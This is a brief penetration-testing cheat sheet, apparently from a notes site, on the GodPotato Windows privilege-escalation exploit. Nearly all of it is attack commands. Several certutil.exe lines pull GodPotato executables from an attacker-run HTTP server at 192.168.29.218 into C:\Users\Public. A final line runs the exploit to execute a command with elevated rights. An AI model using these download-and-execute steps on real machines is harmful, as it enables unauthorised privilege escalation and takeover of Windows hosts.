GodPotato exploit

Github GodPotato

Download Payload to target machine

Use certutil.exe to fetch GodPotato binaries from your HTTP server

certutil.exe -urlcache -split -f "http://192.168.29.218/GodPotato-NET2.exe" C:\Users\Public\GodPotato-NET2.exe
certutil.exe -urlcache -split -f "http://192.168.29.218/GodPotato-NET35.exe" C:\Users\Public\GodPotato-NET35.exe
certutil.exe -urlcache -split -f "http://192.168.29.218/GodPotato-NET4.exe" C:\Users\Public\GodPotato-NET4.exe

Execute Exploit

C:\USers\Public\GodPotato-NET4.exe -cmd "cmd /c whoami"

Last updated